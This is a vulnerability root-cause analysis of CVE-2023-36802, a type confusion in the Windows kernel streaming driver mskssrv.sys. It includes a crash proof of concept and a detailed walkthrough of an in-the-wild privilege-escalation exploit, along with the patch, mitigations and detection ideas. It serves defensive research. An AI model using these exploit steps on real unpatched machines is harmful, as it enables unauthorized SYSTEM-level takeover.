# CVE-2023-36802: Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability
*Benoît Sevens*

## The Basics

**Disclosure or Patch Date:** September 12, 2023

**Product:** Windows

**Advisory:** https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36802

**Affected Versions:**

* Windows 10 without KB5030211 or KB5030214
* Windows 11 without KB5030219 or KB5030217
* Windows Server 2019 without KB5030214
* Windows Server 2022 without KB5030216 or KB503025

**First Patched Version:**

* Windows 10 with KB5030211 or KB5030214
* Windows 11 with KB5030219 or KB5030217
* Windows Server 2019 with KB5030214
* Windows Server 2022 with KB5030216 or KB503025

**Issue/Bug Report:** N/A

**Patch CL:** N/A

**Bug-Introducing CL:** N/A

**Reporter(s):**

* Guanghui Xia (@ze0r) with Hebei HuaCe
* Quan Jin (@jq0904) & ze0r with DBAPPSecurity WeBin Lab
* Valentina Palmiotti with IBM X-Force
* Microsoft Threat Intelligence
* Microsoft Security Response Center

## The Code

**Proof-of-concept:**

```
HANDLE h;
HRESULT hr;
DWORD bytesReturned;
char buf[0x100] = {0};

hr = KsOpenDefaultDevice(KSNAME_Server, GENERIC_READ | GENERIC_WRITE, &h);

memset(buf, 'A', sizeof(buf));
*(int32_t *)buf = 1;
*((int64_t *)buf + 3) = 0;
BOOL status = DeviceIoControl(h, IOCTL_FRAMESERVER_INIT_CONTEXT, &buf, sizeof(buf), &buf, sizeof(buf), &bytesReturned, 0);

memset(buf, 'A', sizeof(buf));
*((DWORD*)buf + 8) = 1;
*((DWORD*)buf + 9) = 1;
status = DeviceIoControl(h, IOCTL_FRAMESERVER_PUBLISH_RX, &buf, sizeof(buf), &buf, sizeof(buf), &bytesReturned, 0);
```

**Exploit sample:** Not public

**Did you have access to the exploit sample when doing the analysis?** Yes

## The Vulnerability

**Bug class:** Type confusion

**Vulnerability details:**

When a `IOCTL_FRAMESERVER_PUBLISH_RX` IOCTL is performed on the `mskssrv` device driver, a call is performed to `FSRendezvousServer::PublishRx()` which in its turn calls `FSStreamReg::PublishRx()`. `FSStreamReg::PublishRx()` will take whatever is in the `FsContext2` field of the `FILE_OBJECT` and use it as a `FsStreamReg` object further on, as long as it is a valid object.

An attacker can precede the `IOCTL_FRAMESERVER_PUBLISH_RX` with a `IOCTL_FRAMESERVER_INIT_CONTEXT` IOCTL on the same device handle, which will initialize the `FsContext2` field to an object of a different type, i.e. of type `FsContextReg`.

`FSStreamReg::PublishRx()` performs several operations on what it thinks is a `FsStreamReg` object, some of which lead to exploitable scenarios, like writing out of bounds.

A similar vulnerability was present in 3 other IOCTL's:

* `IOCTL_FRAMESERVER_PUBLISH_TX`
* `IOCTL_FRAMESERVER_CONSUME_TX`
* `IOCTL_FRAMESERVER_CONSUME_RX`

All of these are referred to with the CVE-2023-36802 identifier.

**Patch analysis:**

Before the patch, `FSRendezvousServer::PublishRx()` would call `FSRendezvousServer::FindObject()` before calling into `FSStreamReg::PublishRx()`. Only if `FSRendezvousServer::FindObject()` returns `TRUE`, `FSStreamReg::PublishRx()` is called. However, `FSRendezvousServer::FindObject()` would not check the type of the object.

The patch changed the `FSRendezvousServer::FindObject()` to check if the type field of the object is specifically set to 2, otherwise it returns `FALSE`. The type field is set to 2 when constructing a `FsStreamReg` object (in `FSStreamReg::FSStreamReg()`). Additionally, `FSRendezvousServer::FindObject()` was renamed to the more appropriate name `FSRendezvousServer::FindStreamObject()`.

**Thoughts on how this vuln might have been found _(fuzzing, code auditing, variant analysis, etc.)_:**

The bug could have been found via manual code auditing or fuzzing. Looking at the proof of concept above, a combination of two IOCTL's with relatively simple input buffers triggers a crash. Valentina Palmiotti found this vulnerability via manual code auditing as described in her [blog post](https://securityintelligence.com/x-force/critically-close-to-zero-day-exploiting-microsoft-kernel-streaming-service/).

**(Historical/present/future) context of bug:**

* June 16, 2023: CVE-2023-29360, another privilege escalation vulnerability inside `mskssrv.sys` which was used by Synacktiv at Pwn2Own 2023, is patched and publicly disclosed. Although within the same driver, CVE-2023-29360 is quite distinct from CVE-2023-36802.
* September 12, 2023: CVE-2023-36802 is patched and publicly disclosed, and reported to have been seen in the wild.
* October 10, 2023: Valentina Palmiotti [publishes](https://securityintelligence.com/x-force/critically-close-to-zero-day-exploiting-microsoft-kernel-streaming-service/) details of CVE-2023-36802 and its exploitation.

## The Exploit

(The terms *exploit primitive*, *exploit strategy*, *exploit technique*, and *exploit flow* are [defined here](https://googleprojectzero.blogspot.com/2020/06/a-survey-of-recent-ios-kernel-exploits.html).)

**Exploit strategy (or strategies):**

* Leak the addresses of relevant kernel objects via the well known `NtQuerySystemInformation` technique.
* Create a kernel pool layout so that future `FSContextReg` allocations land in holes surrounded by attacker controlled data.
* Allocate an `FSContextReg` object (via an `IOCTL_FRAMESERVER_INIT_CONTEXT` IOCTL).
* Perform an out of bounds action on the `FSContextReg` object (via an `IOCTL_FRAMESERVER_PUBLISH_RX`) which will do some interesting write and ultimately set the `PreviousMode` of the `KTHREAD` to 0.
* Use `NtReadVirtualMemory` and `NtWriteVirtualMemory` on kernel addresses to copy the system token to the `EPROCESS` of our current process.
* Clean up.
* Spawn a command of interest, such as `cmd.exe`.

**Exploit flow:**

Depending on the Windows version, two different exploit flows exist in the analyzed in the wild sample. This is due to the fact that depending on the Windows version:

* the `FSStreamReg::PublishRx` code is slightly different, ie recent `mskssrv.sys` versions contain a call to `ObfDereferenceObject` on one of the fields of the `FsStreamReg` object, while older versions don't
* the structure layout of the `FsStreamReg` object is slightly different. This is important for side effects caused in the exploit flow.

Since newer `mskssrv.sys` versions contain a convenient call to `ObfDereferenceObject`, it will use that to decrement the `PreviousMode` field directly to 0. We will look at this exploit flow first.

Since older `mskssrv.sys` versions do not contain the convenient `ObfDereferenceObject` call, the exploit flow is a bit more convoluted. It corrupts a CLFS-specific object to call kernel gadgets via a vtable call.

#### CLFS-less exploit flow

* Open the `mskssrv` device via a call to `KsOpenDefaultDevice`.
* Leak some required kernel addresses via `NtQuerySystemInformation(SystemExtendedHandleInformation, ...)`:
    * the current `KTHREAD` address (and hence current `PreviousMode` address)
    * `EPROCESS` address of System process and current process (and hence their respective `Token` address)
    * `FILE_OBJECT` address of the `mskssrv` device file handle
* Spray the pool with objects of size 0x80 (excluding the 0x10 byte pool header), using a [well known named pipe technique](https://github.com/vp777/Windows-Non-Paged-Pool-Overflow-Exploitation/blob/master/readme.md) of calling `NtFsControlFile` with fsctl code 0x119ff8.
* Close some pipes to create holes in the pool spray.
* Call the `IOCTL_FRAMESERVER_INIT_CONTEXT` ioctl:
    * `FsInitializeContextRendezVous()` calls `FSRendezvousServer::InitializeContext()`
    * `FSRendezvousServer::InitializeContext()` allocates an `FsContextReg` object, which has a size of 0x78 bytes, and sets the `FsContext2` field in the `FILE_OBJECT` to point to this object. The `FsContextReg` object will take the spot of a previously created hole.
* Refill the remaining holes.
* Call the `IOCTL_FRAMESERVER_PUBLISH_RX` ioctl, **in a separate thread**:
    * This will call into `FSRendezvousServer::PublishRx()` and subsequently `FSStreamReg::PublishRx()`.
    * `FSStreamReg::PublishRx()` will expect a `FsStreamReg` object in the `FsContext2` field, which is 0x1d8 bytes large, while in fact a smaller `FsContextReg` object is present, neighbored with controlled data.
    * `FSStreamReg::PublishRx()` will then call `ObfDereferenceObject()` on a field taken out of bounds from a neighboring object. The attacker placed the `PreviousMode` address of the current thread there. This will decrement the `PreviousMode` of the main thread to 0. At this point the attacker can call `NtReadVirtualMemory` and `NtWriteVirtualMemory` on kernel addresses from the main thread.
    * If not taken care of, `FSStreamReg::PublishRx()` will now call `KeSetEvent` on another out of bounds fields, which coincides with the `ProcessBilled` field from a pool header of a neighboring object (which is not attacker controlled). Since this is an invalid pointer, it would bugcheck the system. To prevent this, the attacker keeps `FSStreamReg::PublishRx()` locked in a while loop. This is achieved by forging a self-referencing linked list entry. `FSFrameMdlList::MoveNext` will keep returning the same list entry. The list entry is placed in usermode, so the exploit can break this while loop on demand (see below).
* Meanwhile in the main thread:
    * Try to read the System process token using `NtReadVirtualMemory` in a loop until it succeeds. After `PreviousMode` gets overwritten in the other thread, this will succeed.
    * Write the System token to the `EPROCESS` of the current process using `NtWriteVirtualMemory`.
    * Read the value of the `FsContext2` field out of the `FILE_OBJECT` to get the address of the `FsContextReg` object.
    * Read (for later restore) and overwrite the `ProcessBilled` in one of the neighboring pool chunk headers to NULL, so `KeSetEvent` will not crash the system.
    * Break the currently locked while loop in `FSStreamReg::PublishRx()` by changing the self-referencing list entry. `FSStreamReg::PublishRx()` will now proceed but not call `KeSetEvent` since the field is NULL.
    * Wait for  `FSStreamReg::PublishRx()` to finish in the other thread.
    * Restore the corrupted `ProcessBilled` field to its original value.
    * Increment the refcount in the current `EPROCESS`.
    * Reset the `PreviousMode` to 1.
    * Launch a command of interest, such as `cmd.exe`.

#### Exploit flow with CLFS

On older systems, `FSStreamReg::PublishRx` does not contain a call to `ObfDereferenceObject`. This is unfortunate, as `ObfDereferenceObject` was a very easy primitive to decrement the `PreviousMode`.

However, `FSStreamReg::PublishRx()` will still call `FSFrameMdl::UnmapPages()` on an address taken out of bounds from a neighboring (sprayed) object, which will do a few useful writes at an address taken out of bounds:

* write QWORD 0 at offset 0xc8 from that address
* write DWORD 2 at offset 0x10 from that address

How does the exploit leverage this?

* Leak the required kernel addresses in the same way as in the CLFS-less exploit flow.
* Create a CLFS log file, open it and leak its kernel address (using `NtQuerySystemInformation(SystemExtendedHandleInformation, ...)`).
* Resolve some `nt` kernel gadgets: `PoFxProcessorNotification`, `IoSizeofWorkItem` and `RtlClearBit`
* Forge a fake `CClfsContainer` object at 0x1000000 with a fake vtable at 0x1000800.
* Forge a fake `BitMapHeader` at 0x1000400 with a bitmap pointer pointing to the `PreviousMode` address.
* Spray the pool (again using `NtFsControlFile`), but the crafted objects now contain the kernel address of the CLFS log file + 0x2c9.
* Create holes, allocate the `FsContextReg` object in a hole and refill the remaining holes, just as before.
* Trigger `FSStreamReg::PublishRx()`. `FSFrameMdl::UnmapPages()` will be called on that address read out of bounds and hence write:
    * QWORD 0 at offset 0x2c9+0xc8=0x391 from the start of the CLFS log file in memory
    * DWORD 2 at offset 0x2c9+0x10=0x2d9 from the start of the CLFS log file in memory
* Call `CreateLogFile` which will end up calling `CClfsBaseFilePersisted::CheckSecureAccess`.
    * `ClfsBaseFilePersisted::CheckSecureAccess` will use the DWORD at offset 0x398 as an offset from the end of the log block header (of size 0x70) to find a `CLFS_CONTAINER_CONTEXT` object (via a call to `CClfsBaseFile::GetSymbol()`). But the QWORD write corrupted the least significant byte of that DWORD, which makes the offset change from 0x1460 to 0x1400. So now whatever is at CLFS log file+0x70+0x1400, will be interpreted as a `CLFS_CONTAINER_CONTEXT` object, which is attacker controlled data. At offset 0x18 into this object, a pointer to a `CClfsContainer` object is dereferenced. The exploit places the address 0x1000000 as the pointer there, where it previously prepared a fake `CClfsContainer` object.
    * `CLFS!CClfsBaseFilePersisted::CheckSecureAccess` will then call the first function in the vtable of that object (which is under normal circumstances `CClfsContainer::AddRef`), passing the object itself as the first argument. The exploit placed the `nt!PoFxProcessorNotification` function in the fake vtable. (Note that there is CFG in the CLFS driver, so the exploit has to use allowed function addresses as gadgets.)
    * `nt!PoFxProcessorNotification` will dereference a few addresses of its argument and call one of these addresses with another one of these addresses as an argument. So now the exploit controls both the function that is called and its first argument. The exploit chooses `nt!RtlClearBit` as the function to be called.
    * `nt!RtlClearBit` expects 2 parameters: a pointer to a bitmap header (containing a pointer to the bitmap itself) and a bit number to clear. Recall the exploit prepared a fake bitmap header which has a bitmap pointer pointing to the `PreviousMode` address. The second argument - the bit number to clear - is not controlled but `rdx` is conveniently set to 0. `nt!RtlClearBit` will hence set the `PreviousMode` field to 0.
    * For stability, the exploit prepared a second vtable entry at `nt!IoSizeofWorkItem` - which does nothing but set `eax` - because later on `CClfsBaseFilePersisted::CheckSecureAccess` will call what it thinks is `CClfsContainer::Release`.
* Copy the System process token to the current `EPROCESS`.
* Restore the original 0x1460 offset in the CLFS log file.
* Restore the `PreviousMode` to 1.
* Launch a command of interest, such as `cmd.exe`.

Note that in this version of `mskssrv.sys` and this exploit flow, the exploit didn't have to take care of the awkward `KeSetEvent` call. The reason is that the offset to the field passed to `KeSetEvent` in older versions of `mskssrv.sys` does not fall within a pool chunk header, but rather in controlled sprayed data and was set to NULL this way.

#### Notable differences with Valentina Palmiotti's exploit

It is an interesting exercise to understand the differences between the in the wild exploit described above and the exploit of Valentina Palmiotti as described in her [blog post](https://securityintelligence.com/x-force/critically-close-to-zero-day-exploiting-microsoft-kernel-streaming-service/).

Valentina's exploit is based on the recent `mskssrv.sys` versions. The can be deduced from the presence of an `ObfDereferenceObject` call in the screenshots. So let's compare her exploit with the "CLFS-less exploit flow".

* Valentina uses the "write 2 where" primitive provided by the `FSFrameMdl::UnmapPages()` call, "in conjunction with the I/O Ring technique". The exploit we analyzed used that primitive for older `mskssrv.sys` versions (in conjunction with a CLFS technique), but the "decrement where" primitive provided by the `ObfDereferenceObject()` call in newer `mskssrv.sys` versions.
* Valentina goes through some more complicated pool grooming in combination with an infoleak in `FSStreamReg::GetStats` to prevent a later `KeSetEvent` call from crashing on an invalid pointer. The exploit analyzed here uses a different solution: it triggers the `FSStreamReg::PublishRx` function from a separate thread and keeps it in an locked while loop (using a self-referencing linked list entry in usermode), which prevents the `KeSetEvent` call from being reached. Once it has kernel R/W, it changes the field that triggers the `KeSetEvent` to NULL and then changes the self-referencing linked list entry so the while loop breaks. This means the `KeSetEvent` call will be skipped. (Afterwards it restores the field that would have triggered the `KeSetEvent` call because it's the owning process EPROCESS in a pool chunk).

**Known cases of the same exploit flow:**

The in the wild exploited CVE-2022-37969 CLFS vulnerability followed a very similar exploit flow, as descibed by [Zscaler's blogpost](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part2-exploit-analysis).

**Part of an exploit chain?** This exploit was likely used as a standalone local privilege escalation.

## The Next Steps

### Variant analysis

**Areas/approach for variant analysis (and why):** Given the relatively simple nature of this vulnerability, as well as CVE-2023-29360, more fuzzing and code auditing on the `mskssrv.sys` could yield more bugs.

**Found variants:** N/A

### Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

**Ideas to kill the bug class:**

[CastGuard](https://i.blackhat.com/USA-22/Thursday/US-22-Bialek-CastGuard.pdf) could have potentially caught this bug, since it seems (based on their vtables) that both the `FsStreamReg` and `FsContextReg` type derive from the same `FsRegObject` class.

**Ideas to mitigate the exploit flow:**

* [MTE](https://github.com/saaramar/security_analysis_mte/blob/main/Security%20Analysis%20of%20MTE%20Through%20Examples.pdf) and [CHERI](https://github.com/microsoft/MSRC-Security-Research/blob/master/presentations/2021_08_BlackHatUSA/BHUSA21_Security_Analysis_of_CHERI_ISA.pdf) would not catch the type confusion, but would catch the out of bounds access as a consequence of the type confusion.
* [SMAP](https://github.com/microsoft/MSRC-Security-Research/blob/master/papers/2020/Evaluating%20the%20feasibility%20of%20enabling%20SMAP%20for%20the%20Windows%20kernel.pdf) would catch the user mode access in `FSStreamReg::PublishRx` when dereferencing the fake `FSFrameMdl` pointer in the CLFS-less exploit flow. In the CLFS exploit flow, SMAP would catch the fake `CClfsContainer` object vtable access in usermode.
* Remove kernel address leaks via `NtQuerySystemInformation` calls.

**Other potential improvements:**

N/A

### 0-day detection methods

What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected **as a 0-day**?

* Static signaturing of used exploit techniques (e.g. using Yara).
* Analysing samples based on interesting dynamic signals, such as `NtQuerySystemInformation` calls using the `SystemExtendedHandleInformation` parameter.

## Other References

* [Critically close to zero(day): Exploiting Microsoft Kernel streaming service](https://securityintelligence.com/x-force/critically-close-to-zero-day-exploiting-microsoft-kernel-streaming-service/) by Valentina Palmiotti